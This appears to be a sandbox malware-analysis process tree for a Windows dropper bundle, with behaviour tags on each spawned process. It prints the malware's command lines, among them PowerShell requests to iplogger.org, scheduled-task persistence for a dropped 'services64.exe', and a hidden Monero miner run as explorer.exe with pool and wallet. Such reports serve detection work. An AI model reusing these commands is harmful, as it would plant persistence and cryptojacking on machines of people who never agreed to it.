C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c CoPY /Y "C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh &If "/pPcO7dQJSv4ebP1WI9YNCeWEF27pAh " =="" for %R IN ( "C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE" ) do taskkill -im "%~nXR" /f11⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" Z~DYVRL.v,IzgdZv10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "9A0WhBZPdz28q8nGDw7zbaoO.exe" /f9⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\rR89OztMpbFDOjJIIB7g3CdE.exe"C:\Users\Admin\Documents\rR89OztMpbFDOjJIIB7g3CdE.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 19087⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\cJOoGhW0wL7EgfPdA5zeq_yY.exe"C:\Users\Admin\Documents\cJOoGhW0wL7EgfPdA5zeq_yY.exe"6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "210921.exe" & start "" "Done.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"7⤵
-
C:\Users\Admin\AppData\Local\Temp\210921.exe"210921.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\sviss.exe"C:\Users\Admin\AppData\Local\Temp\sviss.exe"9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1IAiS9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8de8646f8,0x7ff8de864708,0x7ff8de86471810⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\Done.exe"Done.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\1937106983.exe"C:\Users\Admin\AppData\Local\Temp\1937106983.exe"9⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1937106983.exe"C:\Users\Admin\AppData\Local\Temp\1937106983.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\1937106983.exe"C:\Users\Admin\AppData\Local\Temp\1937106983.exe"10⤵
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Fb0pZTyTD4.bat"11⤵
-
C:\Windows\SysWOW64\chcp.comchcp 6500112⤵
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:212⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:213⤵
-
C:\odt\dwm.exe"C:\odt\dwm.exe"12⤵
- Suspicious use of SetThreadContext
-
C:\odt\dwm.exe"C:\odt\dwm.exe"13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11588 -s 110013⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8160 -s 108810⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\IhD_cGja2hQK007Xo3oRfmju.exe"C:\Users\Admin\Documents\IhD_cGja2hQK007Xo3oRfmju.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11888 -s 2567⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\GqxfEzwVgbhMIywGV0_RfsRO.exe"C:\Users\Admin\Documents\GqxfEzwVgbhMIywGV0_RfsRO.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\xdGrLjNVj4ogeSARaXCe282q.exe"C:\Users\Admin\Documents\xdGrLjNVj4ogeSARaXCe282q.exe"6⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\wtfzFwZ5RcXfsINa7tEGOe7O.exe"C:\Users\Admin\Documents\wtfzFwZ5RcXfsINa7tEGOe7O.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\RvYCzJu1nmco14zLRV3AEo5r.exe"C:\Users\Admin\Documents\RvYCzJu1nmco14zLRV3AEo5r.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\BCKI8rXfgNDcU8HfiXWDETSc.exe"C:\Users\Admin\Documents\BCKI8rXfgNDcU8HfiXWDETSc.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\5075304.scr"C:\Users\Admin\AppData\Roaming\5075304.scr" /S7⤵
-
C:\Users\Admin\AppData\Roaming\4116636.scr"C:\Users\Admin\AppData\Roaming\4116636.scr" /S7⤵
-
C:\Users\Admin\AppData\Roaming\3427946.scr"C:\Users\Admin\AppData\Roaming\3427946.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 17126⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun193fda712d9f1.exeSun193fda712d9f1.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7916863.scr"C:\Users\Admin\AppData\Roaming\7916863.scr" /S6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7777711.scr"C:\Users\Admin\AppData\Roaming\7777711.scr" /S6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\7559937.scr"C:\Users\Admin\AppData\Roaming\7559937.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\3215592.scr"C:\Users\Admin\AppData\Roaming\3215592.scr" /S6⤵
-
C:\Users\Admin\AppData\Roaming\3215592.scr"C:\Users\Admin\AppData\Roaming\3215592.scr"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 10767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\5423133.scr"C:\Users\Admin\AppData\Roaming\5423133.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\2919824.scr"C:\Users\Admin\AppData\Roaming\2919824.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 2686⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 2606⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Checks processor information in registry
- Creates scheduled task(s)
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\5699436.exe"C:\ProgramData\5699436.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\2177726.exe"C:\ProgramData\2177726.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\6273333.exe"C:\ProgramData\6273333.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\6273333.exe"C:\ProgramData\6273333.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2568 -s 10769⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\ProgramData\1566366.exe"C:\ProgramData\1566366.exe"8⤵
-
C:\ProgramData\6468184.exe"C:\ProgramData\6468184.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5960 -s 17248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 2848⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5472 -s 17288⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-FFD7A.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-FFD7A.tmp\setup_2.tmp" /SL5="$60274,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-4KPTE.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-4KPTE.tmp\setup_2.tmp" /SL5="$102B0,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 2646⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun1905815e51282417.exeSun1905815e51282417.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-Q7F7R.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q7F7R.tmp\Sun1966fb31dd5a07.tmp" /SL5="$80030,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zSCFB4A0D0\Sun1966fb31dd5a07.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-41DIG.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-41DIG.tmp\Ze2ro.exe" /S /UID=burnerch27⤵
- Executes dropped EXE
-
C:\Program Files\Windows Defender\OEEHUYXGKR\ultramediaburner.exe"C:\Program Files\Windows Defender\OEEHUYXGKR\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-0E8GU.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-0E8GU.tmp\ultramediaburner.tmp" /SL5="$30258,281924,62464,C:\Program Files\Windows Defender\OEEHUYXGKR\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\32-7aa5f-162-aa7a6-e8ac52ce36248\Soqemaeroci.exe"C:\Users\Admin\AppData\Local\Temp\32-7aa5f-162-aa7a6-e8ac52ce36248\Soqemaeroci.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe4,0xe8,0xb8,0xe0,0x10c,0x7ff8de8646f8,0x7ff8de864708,0x7ff8de86471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,9027329524215089850,13488140504854257198,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,9027329524215089850,13488140504854257198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,9027329524215089850,13488140504854257198,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,9027329524215089850,13488140504854257198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,9027329524215089850,13488140504854257198,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,9027329524215089850,13488140504854257198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,9027329524215089850,13488140504854257198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,9027329524215089850,13488140504854257198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,9027329524215089850,13488140504854257198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3360 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,9027329524215089850,13488140504854257198,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3360 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,9027329524215089850,13488140504854257198,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4756 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,9027329524215089850,13488140504854257198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,9027329524215089850,13488140504854257198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3728 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,9027329524215089850,13488140504854257198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
